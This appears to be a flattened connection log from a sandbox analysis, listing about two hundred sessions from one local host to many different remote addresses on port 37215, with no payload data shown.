                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6296192.168.2.1534248197.220.207.12237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6297192.168.2.1532994197.32.202.24937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6298192.168.2.1538568197.70.148.24837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6299192.168.2.1545708197.180.142.9637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6300192.168.2.1542520197.10.124.24037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6301192.168.2.1543182197.184.197.21037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6302192.168.2.1551096197.168.171.2937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6303192.168.2.1545060197.18.72.3337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6304192.168.2.1560018197.154.43.16737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6305192.168.2.1533226197.140.241.10337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6306192.168.2.1547704197.68.203.20537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6307192.168.2.1534588197.246.40.8837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6308192.168.2.1560036197.239.75.17837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6309192.168.2.1542534197.207.244.237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6310192.168.2.1535974197.211.220.16437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6311192.168.2.1556714197.226.126.9037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6312192.168.2.1553454197.63.38.18937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6313192.168.2.1548408197.63.59.5237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6314192.168.2.1549366197.208.66.9837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6315192.168.2.1559422197.191.112.11437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6316192.168.2.1558218197.222.36.22637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6317192.168.2.1547358197.135.6.6737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6318192.168.2.1532868197.0.109.1237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6319192.168.2.1546872197.86.33.22737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6320192.168.2.1541754197.178.33.7537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6321192.168.2.1536970197.153.182.12537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6322192.168.2.1546772197.98.44.12937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6323192.168.2.1552902197.69.25.12437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6324192.168.2.1555888197.204.229.17137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6325192.168.2.1547376197.219.187.11037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6326192.168.2.1535886197.131.0.5237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6327192.168.2.1536542197.90.11.24737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6328192.168.2.1537888197.136.97.11837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6329192.168.2.1553906197.199.184.4237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6330192.168.2.1543972197.223.226.2937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6331192.168.2.1546658197.129.149.25537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6332192.168.2.1533258197.126.17.8237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6333192.168.2.1555098197.80.57.12837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6334192.168.2.1549788197.147.200.23937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6335192.168.2.1533044197.208.66.15237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6336192.168.2.1555666197.173.157.10237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6337192.168.2.1551726197.161.8.17937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6338192.168.2.1553062197.178.166.20037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6339192.168.2.1539626197.30.162.15937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6340192.168.2.1553366197.221.218.737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6341192.168.2.1549528197.254.53.9437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6342192.168.2.1554616197.196.72.1537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6343192.168.2.1558426197.55.248.19037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6344192.168.2.1553012197.203.189.10437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6345192.168.2.1546020197.84.24.11637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6346192.168.2.1553088197.223.250.21337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6347192.168.2.1556410197.113.201.12637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6348192.168.2.1534516197.54.201.4437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6349192.168.2.1551688197.75.158.23837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6350192.168.2.1548322197.13.107.12737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6351192.168.2.1548500197.170.91.23837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6352192.168.2.1549804197.5.209.20037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6353192.168.2.1559408197.216.199.18737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6354192.168.2.1544812197.114.192.8437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6355192.168.2.1537204197.36.185.20037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6356192.168.2.1550926197.238.30.12937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6357192.168.2.1551918197.11.28.1937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6358192.168.2.1532990197.2.188.3737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6359192.168.2.1554634197.99.154.23137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6360192.168.2.1544782197.195.200.19737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6361192.168.2.1546802197.30.176.9337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6362192.168.2.1560616197.136.221.18137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6363192.168.2.1545292197.10.105.7837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6364192.168.2.1554144197.199.48.3337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6365192.168.2.1559094197.67.9.15137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6366192.168.2.1539178197.227.215.8337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6367192.168.2.1555048197.83.52.10637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6368192.168.2.1538926197.154.206.3137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6369192.168.2.1558586197.163.187.17237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6370192.168.2.1555952197.92.6.3937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6371192.168.2.1542938197.139.125.24237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6372192.168.2.1549374197.87.191.1937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6373192.168.2.1544448197.151.36.3137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6374192.168.2.1551914197.147.242.22037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6375192.168.2.1556730197.223.82.6737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6376192.168.2.1560294197.244.179.6037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6377192.168.2.1534542197.7.25.18037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6378192.168.2.1544390197.7.149.20337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6379192.168.2.1544862197.124.128.4037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6380192.168.2.1535386197.248.30.24137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6381192.168.2.1556946197.28.82.25437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6382192.168.2.1555978197.204.149.5737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6383192.168.2.1541774197.240.174.25137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6384192.168.2.1559740197.149.31.7837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6385192.168.2.1541714197.120.252.17437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6386192.168.2.1534054197.167.241.7737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6387192.168.2.1533276197.101.29.16537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6388192.168.2.1543184197.36.233.23237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6389192.168.2.1551138197.62.24.3737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6390192.168.2.1546300197.189.18.15037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6391192.168.2.1549464197.103.121.13637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6392192.168.2.1549138197.97.218.6437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6393192.168.2.1552410197.163.235.25537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6394192.168.2.1547654197.34.220.17037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6395192.168.2.1535624197.250.135.12837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6396192.168.2.1545582197.236.157.9937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6397192.168.2.1550678197.97.134.537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6398192.168.2.1557776197.9.28.16737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6399192.168.2.1536320197.137.33.17437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6400192.168.2.1559562197.146.25.12337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6401192.168.2.1542770197.99.94.2037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6402192.168.2.1551180197.51.76.4437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6403192.168.2.1560944197.254.125.20637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6404192.168.2.1550078197.169.209.7937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6405192.168.2.1555588197.35.167.6637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6406192.168.2.1551906197.68.116.7537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6407192.168.2.1557410197.146.231.1337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6408192.168.2.1543362197.82.177.11437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6409192.168.2.1535030197.241.149.18637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6410192.168.2.1560366197.106.112.17637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6411192.168.2.1558542197.180.86.25137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6412192.168.2.1547614197.77.167.7837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6413192.168.2.1543376197.49.100.23537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6414192.168.2.1536090197.136.178.23437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6415192.168.2.1538674197.225.244.1937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6416192.168.2.1558794197.88.116.1537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6417192.168.2.1545678197.199.69.17437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6418192.168.2.1552354197.233.169.16537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6419192.168.2.1556340197.170.60.13637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6420192.168.2.1536930197.98.230.22037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6421192.168.2.1534576197.42.65.14437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6422192.168.2.1537108197.151.115.20537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6423192.168.2.1556676197.188.172.25337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6424192.168.2.1551142197.231.215.25137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6425192.168.2.1552532197.145.122.4737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6426192.168.2.1554876197.50.230.17737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6427192.168.2.1557216197.165.244.13037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6428192.168.2.1556784197.238.45.16637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6429192.168.2.1545474197.88.186.937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6430192.168.2.1542904197.159.99.7037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6431192.168.2.1537784197.195.91.23137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6432192.168.2.1544718197.197.231.20937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6433192.168.2.1541962197.125.96.22137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6434192.168.2.1542782197.174.171.8037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6435192.168.2.1543000197.165.81.5537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6436192.168.2.1551066197.224.74.25537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6437192.168.2.1556994197.29.175.18937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6438192.168.2.1549830197.125.79.18337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6439192.168.2.1551540197.207.192.6137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6440192.168.2.1557472197.55.178.11237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6441192.168.2.1543654197.119.217.22237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6442192.168.2.1558674197.54.194.6737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6443192.168.2.1549556197.193.167.7837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6444192.168.2.1543304197.251.25.5337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6445192.168.2.1554298197.71.142.22237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6446192.168.2.1555342197.164.224.15937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6447192.168.2.1555738197.141.179.2537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6448192.168.2.1560574197.227.129.19237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6449192.168.2.1556320197.146.14.18537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6450192.168.2.1540436197.55.22.23937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6451192.168.2.1533522197.144.47.23837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6452192.168.2.1553792197.249.156.9237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6453192.168.2.1548746197.40.129.15237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6454192.168.2.1554214197.185.84.14337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6455192.168.2.1536230197.221.183.19637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6456192.168.2.1559390197.132.46.5237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6457192.168.2.1549456197.94.82.3337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6458192.168.2.1548756197.3.153.18437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6459192.168.2.1554644197.144.16.1837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6460192.168.2.1559800197.0.229.21537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6461192.168.2.1550772197.57.50.14037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6462192.168.2.1538554197.85.164.17337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6463192.168.2.1539426197.89.19.24137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6464192.168.2.1553846197.73.3.15837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6465192.168.2.1533990197.28.25.16837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6466192.168.2.1556546197.235.225.7737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6467192.168.2.1553066197.70.55.13037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6468192.168.2.1542528197.201.234.19437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6469192.168.2.1546318197.29.30.15537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6470192.168.2.1553576156.70.93.5337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6471192.168.2.1544376156.107.101.16937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6472192.168.2.1552040156.84.246.13137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6473192.168.2.1537368156.195.200.6837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6474192.168.2.1542650156.198.181.9137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6475192.168.2.1534508156.67.3.2737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6476192.168.2.1550230156.14.39.23037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6477192.168.2.1539522156.60.170.4837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6478192.168.2.1547850156.253.144.8437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6479192.168.2.1535758156.176.35.19237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6480192.168.2.1548872156.170.2.3137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6481192.168.2.1538028156.197.246.10737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6482192.168.2.1550024156.81.73.16437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6483192.168.2.1543010156.86.34.6237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6484192.168.2.1558734156.140.222.10537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6485192.168.2.1539074156.0.17.4337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6486192.168.2.1548038156.106.164.11637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6487192.168.2.1539358156.206.199.15237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6488192.168.2.1538218156.45.49.20837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6489192.168.2.1556186156.71.244.7937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6490192.168.2.1547072156.56.131.15237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6491192.168.2.1552958156.57.223.17937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6492192.168.2.1559790156.4.92.12437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6493192.168.2.1542686156.16.57.17237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6494192.168.2.1554294156.250.182.24937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6495192.168.2.1553886156.8.47.17837215
